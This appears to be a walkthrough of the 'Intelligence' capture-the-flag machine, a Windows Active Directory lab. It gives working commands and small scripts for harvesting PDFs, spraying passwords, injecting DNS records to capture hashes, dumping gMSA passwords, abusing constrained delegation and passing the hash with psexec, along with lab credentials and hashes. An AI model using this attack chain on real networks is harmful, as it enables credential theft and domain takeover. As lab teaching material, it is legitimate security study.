Intelligence

Enumeration

Open Port

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2021-08-06 12:35:56Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default

<STRIPED>

Web Enumeration

As we try to dowload the document we notice that file names are in date-stamps! Let’s find out all the valid file names using feroxbuster. And then we can download them. I automated this process…

Create Date Stamp Wordlist

I used BruteSploit from github! To generate a wordlist from 2019 to 2021

./wordlist-gen.sh -b 2019-01-01 -e 2021-12-31 -f yyyymmdd -s - -o wordlist.txt -a "-upload.pdf"

I used the above command to generate the wordlist

FeroxBuster

Dumper And Extractor

I created a small py scripts to dump (dowload) those PDFs, and then extractor to get useful info like password?

# dumper.py

#!/usr/bin/env python3
import requests


x = ["http://intelligence.htb/documents/2020-01-02-upload.pdf"]

# Above is a representation of what it had. You will have to put the feroxbuster's urls into a list here.


for url in x:
    r = requests.get(url, allow_redirects=True)
    with open(f"""{url.split('/')[-1]}""", 'wb') as f:
        f.write(r.content)

# extractor.py
#!/usr/bin/env python3
import PyPDF2 as x
names = ["2020-01-01-upload.pdf"]

# Above is a representation of what it had. You will have to put the downloaded file's file names.

for i in names:
    fileobject = open(i,'rb')
    pdfreader =  x.PdfFileReader(fileobject)
    pageobj = pdfreader.getPage(0)
    if pageobj.extractText().find("password")!=-1: 
        print(pageobj.extractText())
        print(i)

PDF File Enumeration

I got the default password from the PDF file

2020-06-04-upload.pdf

New Account Guide
Welcome to Intelligence Corp!
Please login using your username and the default password of:
NewIntelligenceCorpUser9876
After logging in please change your password as soon as possible.

I made a users wordlist from exif of the pdf

exiftool * | grep Creator > users

FootHold

Finding correct Credentials

I ran the following command crackmapexec smb intelligence.htb -u users -p "NewIntelligenceCorpUser9876"

I got the above as the credentials intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876

Now let’s See whats in Users Shares

Inside Tiffany.Molina folder in Desktop we find user.txt. Got our flag!

Privilege Escalation

Injecting DNS Record Using LDAP

As we read the downdetector.ps1 it checks with default creds if the site is alive/dead.

# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory 
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*")  {
try {
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {
Send-MailMessage -From 'Ted Graves <[email protected]>' -To 'Ted Graves <[email protected]>' -Subject "Host: $($record.Name) is down"
}
} catch {}
}

So we shall inject out ip as a dns record using ldap. I used dnstoo.py

and then I set up responder to get the hash

./dnstool.py -u "10.10.10.248\Tiffany.Molina" -p "NewIntelligenceCorpUser9876" 10.10.10.248 -a add -d 10.10.14.24 -r web.intelligence.htb

And the hash

CRACKED!

CREDENTIALS: TED.GRAVES:Mr.Teddy

Read GMSA Password

python3 gMSADumper.py -u "TED.GRAVES" -p "Mr.Teddy" -d intelligence.htb

svc_int$:::5e47bac787e5e1970cf9acdb5b316239

Now we have the hash of svc_int$

Constrained Delegation Exploitation

Following this article

impacket-GetUserSPNs "intelligence.htb/svc_int$" -request-user UNCONSTRAINED_USER -hashes :5e47bac787e5e1970cf9acdb5b316239

That step was done to check if it had unconstrained delegation!

Constrained Delegation User Impersonation

impacket-getST -spn www/dc.intelligence.htb -impersonate administrator intelligence.htb/svc_int$ -hashes :5e47bac787e5e1970c f9acdb5b316239

The above command makes an cache of the ticket similar to the article

And then I import the kerberos TGT ticket

Finally I ll use secretsdump.py

Got administrator hash Administrator:500:aad3b435b51404eeaad3b435b51404ee:9075113fe16cf74f7c0f9b27e882dad3:::

We will use Administrator hash with psexec impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:9075113fe16cf74f7c0f9b27e882dad3 [email protected]

Enumeration#

Open Port#

Web Enumeration#

Create Date Stamp Wordlist#

FeroxBuster#

Dumper And Extractor#

PDF File Enumeration#

FootHold#

Finding correct Credentials#

Privilege Escalation#

Injecting DNS Record Using LDAP#

Read GMSA Password#

Constrained Delegation Exploitation#

Constrained Delegation User Impersonation#